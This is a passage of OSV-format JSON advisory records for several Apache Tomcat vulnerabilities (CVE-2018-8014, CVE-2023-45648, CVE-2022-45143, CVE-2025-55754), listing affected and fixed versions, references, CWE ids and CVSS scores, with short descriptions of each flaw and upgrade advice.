"8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r4x2-3cq5-hqvp/GHSA-r4x2-3cq5-hqvp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0RC1" }, { "fixed": "8.0.53" } ] } ], "versions": [ "8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.8", "8.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r4x2-3cq5-hqvp/GHSA-r4x2-3cq5-hqvp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.41" }, { "fixed": "7.0.88" } ] } ], "versions": [ "7.0.41", "7.0.42", "7.0.47", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r4x2-3cq5-hqvp/GHSA-r4x2-3cq5-hqvp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8014" }, { "type": "WEB", "url": "https://github.com/apache/tomcat80/commit/2c9d8433bd3247a2856d4b2555447108758e813e" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d83a76732e6804739b81d8b2056365307637b42d" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/5877390a9605f56d9bd6859a54ccbfb16374a78b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/60f596a21fd6041335a3a1a4015d4512439cecb5" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/fbfb713e4f8a4c0f81089b89450828011343593800cae3fb629192b1@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/fbfb713e4f8a4c0f81089b89450828011343593800cae3fb629192b1%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/06/msg00008.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181018-0002" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3665-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20181017143233/http://www.securityfocus.com/bid/104203" }, { "type": "WEB", "url": "https://web.archive.org/web/20201207080723/http://www.securitytracker.com/id/1041888" }, { "type": "WEB", "url": "https://web.archive.org/web/20201207101131/http://www.securitytracker.com/id/1040998" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2469" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2470" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:3768" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0451" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1529" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2205" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-r4x2-3cq5-hqvp" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4%40%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-7.html" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-1188" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:53:40Z", "nvd_published_at": "2018-05-16T16:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r6j3-px5g-cq3x", "published": "2023-10-10T21:31:12Z", "modified": "2025-08-08T18:51:54.671117Z", "aliases": [ "BIT-tomcat-2023-45648", "CVE-2023-45648" ], "summary": "Apache Tomcat Improper Input Validation vulnerability", "details": "Improper Input Validation vulnerability in Apache Tomcat.\n\nTomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single \nrequest as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45648" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/59583245639d8c42ae0009f4a4a70464d3ea70a0" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8ecff306507be8e4fd3adee1ae5de1ea6661a8f4" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/c83fe47725f7ae9ae213568d9039171124fb7ec6" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/eb5c094e5560764cda436362254997511a3ca1f6" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/2pv8yz1pyp088tsxfb7ogltk9msk0jdp" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231103-0007" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5521" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5522" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/10/10" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2023-10-10T22:29:58Z", "nvd_published_at": "2023-10-10T19:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rq2w-37h9-vg94", "published": "2023-01-03T21:30:21Z", "modified": "2024-04-23T22:00:59.346897Z", "aliases": [ "BIT-tomcat-2022-45143", "CVE-2022-45143" ], "summary": "Apache Tomcat improperly escapes input from JsonErrorReportValve", "details": "The `JsonErrorReportValve` in Apache Tomcat 8.5.83, 9.0.40 to 9.0.68 and 10.1.0-M1 to 10.1.1 does not escape the `type`, `message` or `description` values. In some circumstances these are constructed from user provided data and it was therefore possible for users to supply values that invalidated or manipulated the JSON output.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.83" }, { "fixed": "8.5.84" } ] } ], "versions": [ "8.5.83" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.40" }, { "fixed": "9.0.69" } ] } ], "versions": [ "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.68", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0" }, { "fixed": "10.1.2" } ] } ], "versions": [ "10.1.0", "10.1.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0" }, { "fixed": "10.1.2" } ] } ], "versions": [ "10.1.0", "10.1.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-util", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-util" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.83" }, { "fixed": "8.5.84" } ] } ], "versions": [ "8.5.83" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-util", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-util" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.40" }, { "fixed": "9.0.69" } ] } ], "versions": [ "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45143" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0cab3a56bd89f70e7481bb0d68395dc7e130dbbf" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/6a0ac6a438cbbb66b6e9c5223842f53bf0cb50aa" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b336f4e58893ea35114f1e4a415657f723b1298e" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/yqkd183xrw3wqvnpcg3osbcryq85fkzj" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-37" } ], "database_specific": { "cwe_ids": [ "CWE-116", "CWE-74" ], "github_reviewed": true, "github_reviewed_at": "2023-01-05T12:02:50Z", "nvd_published_at": "2023-01-03T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vfww-5hm6-hx2j", "published": "2025-10-27T18:31:13Z", "modified": "2025-11-05T21:08:45.601566Z", "aliases": [ "CVE-2025-55754" ], "related": [ "CGA-86pw-75p3-rgc3", "CGA-8f6v-724m-6v95", "CGA-mffp-g3xg-8r68" ], "summary": "Apache Tomcat Vulnerable to Improper Neutralization of Escape, Meta, or Control Sequences", "details": "Tomcat did not escape ANSI escape sequences in log messages. If Tomcat was running in a console on a Windows operating system, and the console supported ANSI escape sequences, it was possible for an attacker to use a specially crafted URL to inject ANSI escape sequences to manipulate the console and the clipboard and attempt to trick an administrator into running an attacker controlled command. While no attack vector was found, it may have been possible to mount this attack on other operating systems.\n\n\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.40 through 9.0.108.\n\nThe following versions were EOL at the time the CVE was created but are \nknown to be affected: 8.5.60 though 8.5.100. Other, older, EOL versions may also be affected.\nUsers are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", 